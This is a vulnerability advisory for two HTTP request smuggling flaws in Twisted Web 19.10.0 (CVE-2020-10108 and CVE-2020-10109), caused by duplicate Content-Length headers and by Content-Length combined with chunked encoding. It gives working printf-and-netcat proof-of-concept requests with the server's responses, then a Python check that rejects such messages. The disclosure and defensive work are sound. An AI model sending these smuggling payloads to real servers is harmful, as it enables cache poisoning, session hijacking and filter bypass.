The following document describes identified vulnerabilities in the Twisted application version 19.10.0.
Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses. By exploiting inconsistencies in HTTP message parsing, attackers can smuggle complete or partial secondary HTTP messages to a remote server to attack backend services or other users.
In this case, risk is highly contextual: it depends on where and why Twisted is deployed in a given environment. The impact will vary with the business purpose of the service built on Twisted.
For more information on the impact of HTTP request splitting vulnerabilities, please refer to the following:
Overall Security Risk: High

Product Vendor | Product Name | Affected Version |
Twisted Matrix Labs | Twisted | 19.10.0 |
Twisted is an event-driven networking engine written in Python. The project’s official website is https://twistedmatrix.com/. The latest version of the application is 20.3.0rc1, released on March 9, 2020.
One vulnerability was identified within the Twisted application:
Vulnerability | Remediation |
HTTP Request Splitting [Two Instances] | Update to version 20.3.0rc1. |
This vulnerability is described in the following sections.
Two HTTP request splitting (AKA HTTP request smuggling) vulnerabilities were identified in the latest version of Twisted Web. Both issues arose from deviations from RFC 7230 (HTTP/1.1: Message Syntax and Routing). Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses.
To demonstrate the vulnerabilities, netcat and printf command examples are provided to construct raw HTTP messages as the client. For the server, I started Twisted Web 19.10.0 using twistd web --path . --port tcp:<port> (Twisted Framework Python apps that use twisted.web are also affected).
CVE ID | Security Risk | Impact | Access Vector |
CVE-2020-10108 | High | HTTP Request Splitting | Remote, Other |
When presented with two content-length headers, Twisted Web ignored the first header. When the second content-length was set to zero, it caused Twisted Web to interpret the request body as a pipelined request.
According to RFC 7230 Section 3.3.3 (rule 4), if a message is received with multiple Content-Length headers carrying differing values, the server must reject the message with a 400 response.
Request
printf 'GET /doesnotexist HTTP/1.1\r\n'\
'Content-Length: 56\r\n'\
'Content-Length: 0\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'GET /?opfdii=k58inf HTTP/1.1\r\n'\
'Host: test.example.com\r\n'\
'\r\n' | nc 127.0.0.1 <port>
Response
HTTP/1.1 404 Not Found
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 145
<html>
<head><title>404 - No Such Resource</title></head>
<body>
<h1>No Such Resource</h1>
<p>File not found.</p>
</body>
</html>
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT
Hello
As shown above, both the request to /doesnotexist and the smuggled request to the base path / were successfully resolved.
CVE ID | Security Risk | Impact | Access Vector |
CVE-2020-10109 | High | HTTP Request Splitting | Remote, Other |
When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted by Twisted Web as a pipelined request.
According to RFC 7230 Section 3.3.3 (rule 3), if a message carrying both Content-Length and chunked Transfer-Encoding is accepted at all, Transfer-Encoding overrides the Content-Length.
Request
printf 'GET /?nkomd7=8h7pjm HTTP/1.1\r\n'\
'Transfer-Encoding: chunked\r\n'\
'Content-Length: 4\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'33\r\n'\
'GET /?ab8c4i=deg3if HTTP/1.1\r\n'\
'Content-Length: 5\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'\r\n'\
'0\r\n'\
'\r\n' | nc 127.0.0.1 <port>
Response
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT
Hello
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT
Hello
As shown above, smuggled requests were interpreted by the Twisted server. The impact of these vulnerabilities can vary depending on the surrounding infrastructure and the purpose of the service implemented with Twisted.
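The two framing rules the advisory cites can be enforced in front of a vulnerable backend. The following is an added example written for this page (not Twisted's code and not the original proof of concept): a small RFC 7230 section 3.3.3 check of the kind a reverse proxy or request filter could apply, run against constructed copies of the message heads from both CVE sections above.

```python
class FramingError(ValueError):
    """Raised when the framing is ambiguous; the correct response is a 400."""

def parse_headers(raw):
    """Split the head of a raw HTTP/1.1 message into (name, value) pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers

def message_framing(raw):
    """Return 'chunked', 'content-length' or 'none', or raise FramingError when
    RFC 7230 section 3.3.3 rules 3 and 4 say the message must be rejected."""
    headers = parse_headers(raw)
    lengths = [v for n, v in headers if n == "content-length"]
    codings = [v for n, v in headers if n == "transfer-encoding"]
    # Rule 3: Transfer-Encoding together with Content-Length is a smuggling
    # signal; the RFC permits rejecting outright, the safe choice for a proxy.
    if codings and lengths:
        raise FramingError("both Transfer-Encoding and Content-Length present")
    if codings:
        if codings[-1].split(",")[-1].strip().lower() != "chunked":
            raise FramingError("final Transfer-Encoding is not chunked")
        return "chunked"
    # Rule 4: several Content-Length fields (or a list value) must all agree;
    # otherwise reject instead of silently picking one, as 19.10.0 did.
    if lengths:
        values = {v.strip() for v in ",".join(lengths).split(",")}
        value = values.pop()
        if values or not (value.isascii() and value.isdigit()):
            raise FramingError("conflicting or malformed Content-Length")
        return "content-length"
    return "none"

def accept_request(raw):
    """True if the framing is unambiguous, False if the request should get a 400."""
    try:
        message_framing(raw)
        return True
    except FramingError:
        return False

# Constructed copies of the heads of this advisory's two proof-of-concept requests.
CVE_2020_10108 = (b"GET /doesnotexist HTTP/1.1\r\nContent-Length: 56\r\n"
                  b"Content-Length: 0\r\nHost: test.example.com\r\n\r\n")
CVE_2020_10109 = (b"GET /?nkomd7=8h7pjm HTTP/1.1\r\nTransfer-Encoding: chunked\r\n"
                  b"Content-Length: 4\r\nHost: test.example.com\r\n\r\n")
```

Both constructed heads are refused by accept_request, while a single Content-Length, a repeated but identical Content-Length, or a Transfer-Encoding list ending in chunked passes.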